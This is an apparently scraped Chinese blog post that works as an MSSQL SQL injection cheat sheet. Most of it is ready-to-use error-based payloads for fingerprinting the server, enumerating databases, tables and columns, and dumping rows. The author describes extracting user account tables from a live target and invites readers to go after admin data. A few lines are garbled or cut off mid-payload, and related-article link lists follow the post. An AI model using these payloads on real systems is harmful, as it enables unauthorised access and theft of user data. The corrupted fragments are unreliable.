mssql注入
①判断数据库类型
and exists (select * from sysobjects)--返回正常为mssql(也名sql server)
and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈sql
②判断数据库版本
and 1=@@version--这个语句要在有回显的模式下才能够哦
and substring((select @@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本,返回正常就是2008的复制代码第一条语句执行效果图(相似):第二条语句执行效果图:(若是是2008的话就返回正常)数据库
③获取全部数据库的个数 (一下3条语句可供选择使用)
1. and 1=(select quotename(count(name)) from master..sysdatabases)--
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
3. and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
说明:dbid从1-4的数据库通常为系统数据库.浏览器
⑤获取数据库 (该语句是一次性获取所有数据库的,且语句只适合>=2005,两条语句可供选择使用)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--测试
⑥获取当前数据库
and db_name()>0spa
and 1=(select db_name())--server
⑦获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库全部表(只限于mssql2005及以上版本)】
and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--复制代码测试效果图:获得 3个敏感的表:Whir_Sec_Users/Whir_Mem_Member/Whir_Mem_MemberGroupblog
⑧得到表里的列
一次爆指定表的全部列(只限于mssql2005及以上版本):
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--string
效果图:既然有帐户信息,我就无论是否是管理员的的了,我帖子的目的不是为了获得管理员的信息,只是为了演示能够经过这个方法来获取相关信息。io
⑨获取指定数据库中的表的列的数据库
逐条爆指定表的全部字段的数据(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
一次性爆N条全部字段的数据(只限于mssql2005及以上版本):
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图:----------------------------------加上where条件筛选结果出来会更加好,如:where and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错。
注意:在使用一次获取数据库信息的语句时,请使用火狐浏览器,笔者测试 IE八、360急速浏览器、猎豹浏览器均卡死,火狐浏览器也会致使出现几秒钟的卡死,弹出框框,咱们点击“中止脚本”就会获得初步解决。!!!!!!!!!!!!!!!!!!!!至此,咱们已经获得了帐户信息了,至于管理员的呢,哈哈,你们自行测试时换表啥的就行了。ast
- 1. mssql 注入
- 2. MSSQL-反弹注入
- 3. mssql注入实验
- 4. MSSQL反弹注入
- 5. mssql手工注入
- 6. 封神台MSSQL注入 - 反弹注入
- 7. MSSQL注入基础语句
- 8. MSSQL注入:显错注入及反弹注入
- 9. mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
- 10. 高级的MSSQL注入技巧
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依赖注入)的实现方式:属性注入和构造注入 - Spring教程
- • YAML 入门教程
- • Spring Cloud 微服务实战(三) - 服务注册与发现
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. eclipse设置粘贴字符串自动转义
- 2. android客户端学习-启动模拟器异常Emulator: failed to initialize HAX: Invalid argument
- 3. android.view.InflateException: class com.jpardogo.listbuddies.lib.views.ListBuddiesLayout问题
- 4. MYSQL8.0数据库恢复 MYSQL8.0ibd数据恢复 MYSQL8.0恢复数据库
- 5. 你本是一个肉体,是什么驱使你前行【1】
- 6. 2018.04.30
- 7. 2018.04.30
- 8. 你本是一个肉体,是什么驱使你前行【3】
- 9. 你本是一个肉体,是什么驱使你前行【2】
- 10. 【资讯】LocalBitcoins达到每周交易比特币的7年低点
- 1. mssql 注入
- 2. MSSQL-反弹注入
- 3. mssql注入实验
- 4. MSSQL反弹注入
- 5. mssql手工注入
- 6. 封神台MSSQL注入 - 反弹注入
- 7. MSSQL注入基础语句
- 8. MSSQL注入:显错注入及反弹注入
- 9. mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
- 10. 高级的MSSQL注入技巧